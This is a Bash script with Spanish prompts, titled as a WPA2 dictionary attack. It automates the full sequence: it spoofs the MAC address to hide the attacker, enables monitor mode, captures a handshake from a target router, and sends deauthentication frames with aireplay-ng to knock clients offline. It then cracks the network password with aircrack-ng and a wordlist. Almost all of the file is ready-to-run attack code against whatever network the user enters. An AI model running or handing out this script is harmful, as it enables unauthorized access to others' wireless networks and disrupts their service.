#!/bin/bash

echo " "
echo "				 ██░ ██  ▄▄▄       ▄████▄   ██ ▄█▀    █     █░ ██▓███   ▄▄▄         .:22222222°.	"
echo "				▓██░ ██▒▒████▄    ▒██▀ ▀█   ██▄█▒    ▓█░ █ ░█░▓██░  ██▒▒████▄       	       22)	"
echo "				▒██▀▀██░▒██  ▀█▄  ▒▓█    ▄ ▓███▄░    ▒█░ █ ░█ ▓██░ ██▓▒▒██  ▀█▄     	       22	"
echo "				░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄    ░█░ █ ░█ ▒██▄█▓▒ ▒░██▄▄▄▄██    	     22		"
echo "				░▓█▒░██▓ ▓█   ▓██▒▒ ▓███▀ ░▒██▒ █▄   ░░██▒██▓ ▒██▒ ░  ░ ▓█   ▓██▒        1122		"
echo "				 ▒ ░░▒░▒ ▒▒   ▓▒█░░ ░▒ ▒  ░▒ ▒▒ ▓▒   ░ ▓░▒ ▒  ▒▓▒░ ░  ░ ▒▒   ▓▒█░      22		"
echo "				 ▒ ░▒░ ░  ▒   ▒▒ ░  ░  ▒   ░ ░▒ ▒░     ▒ ░ ░  ░▒ ░       ▒   ▒▒ ░    22			"
echo "				 ░  ░░ ░  ░   ▒   ░        ░ ░░ ░      ░   ░  ░░         ░   ▒      22			"
echo "				 ░  ░  ░      ░  ░░ ░      ░  ░          ░                   ░  ░  22 			"
echo "				                  ░                                                °.22222222222  	"
echo " "
echo " "
echo " 						Ataque a WPA2 por Diccionario Version 1.0				"
echo " "
echo " 							 Created BY Anonimo501						"
echo " 						   https://youtube.com/c/Anonimo501					"
echo " "
echo "		<------------------------------------------------------------------------------------------------------> "
echo " "
echo " 		Spoof the mac address "
echo " "
echo "		<------------------------------------------------------------------------------------------------------> "
		read -rsp $'Press enter to continue...\n'
		ifconfig
echo " "
echo "		<------------------------------------------------------------------------------------------------------> "
echo " "
echo " 		Ingrese la interface que cambiara de Mac para su proteccion. Ejemplo: wlan0 "
echo " "
echo "		<------------------------------------------------------------------------------------------------------> "
echo " "
		read interface
echo " "
		ifconfig $interface down
		macchanger -m 00:11:22:33:44:55 $interface
		ifconfig $interface up
echo " "
echo "		<------------------------------------------------------------------------------------------------------> "
		read -rsp $'Press enter to continue...\n'
echo " "
echo "		<------------------------------------------------------------------------------------------------------> "
echo " "
echo " 		Se mataran los procesos de red - luego de esto reinicia el servicio NetworkManager o reinicia el sistema "
echo " "
echo "		<------------------------------------------------------------------------------------------------------> "
		read -rsp $'Press enter to continue...\n'
		airmon-ng check kill
echo " "
echo "		<------------------------------------------------------------------------------------------------------> "
echo " "
echo " 		Ingrese la interface de red para habilitar como modo monitor. Ejemplo: wlan0 "
echo " "
echo "		<------------------------------------------------------------------------------------------------------> "
echo " "
		read interfc
echo " "
		airmon-ng start $interfc
		read -rsp $'Press enter to continue...\n'
echo " "
echo "		<------------------------------------------------------------------------------------------------------> "
echo " "
echo " 		Ingrese la interface de  modo monitor. Ejemplo: wlan0mon "
echo " "
echo "		<------------------------------------------------------------------------------------------------------> "
		read monitor
		gnome-terminal -e "airodump-ng $monitor" &
echo " "
echo "		<------------------------------------------------------------------------------------------------------> "
echo " "
echo " 		wpa handshake "
echo " "
echo "		<------------------------------------------------------------------------------------------------------> "
echo " "
echo " 		Ingrese el ch/canal de la red atacar. Ejemplo: 7 "
echo " "
echo "		<------------------------------------------------------------------------------------------------------> "
		read ch
echo " "
echo "          <------------------------------------------------------------------------------------------------------> "
echo " "
echo " 		Ingrese la MAC de la red atacar. Ejemplo: 55:44:33:22:11:00 "
echo " "
echo "		<------------------------------------------------------------------------------------------------------> "
		read macrouter
echo " "
echo "          <------------------------------------------------------------------------------------------------------> "
echo " "
echo " 		Se creara un archivo con el nombre crackme.cap en la ruta que nos encontramos "
echo " 		<-----------------------------------------------------------------------------> "
echo " 		Cierre la ventana que esta escaneando las redes antes de continuar"
echo " "
echo "		<------------------------------------------------------------------------------------------------------> "
echo " "
		read -rsp $'Press enter to continue...\n'
		gnome-terminal -e "airodump-ng -c $ch --bssid $macrouter -w crackme $monitor" &
echo " "
echo "		<------------------------------------------------------------------------------------------------------> "
echo " "
echo " 		Ingresa el numero de veces que deauthenticaremos con  aireplay. Ejemplo: 30 "
		read deauthenumero
		gnome-terminal -e "aireplay-ng -0 $deauthenumero -a $macrouter $monitor"
echo " "
echo "		<------------------------------------------------------------------------------------------------------> "
echo " "
echo " 		Attack con diccionario "
echo " "
echo "		<------------------------------------------------------------------------------------------------------> "
echo " "
echo " 		Ingresa el nombre del diccionario. (debes tener el diccionario en esta ruta-donde estas ejecutando el script)  "
		read dic
		aircrack-ng -w $dic -b $macrouter crackme-01.cap
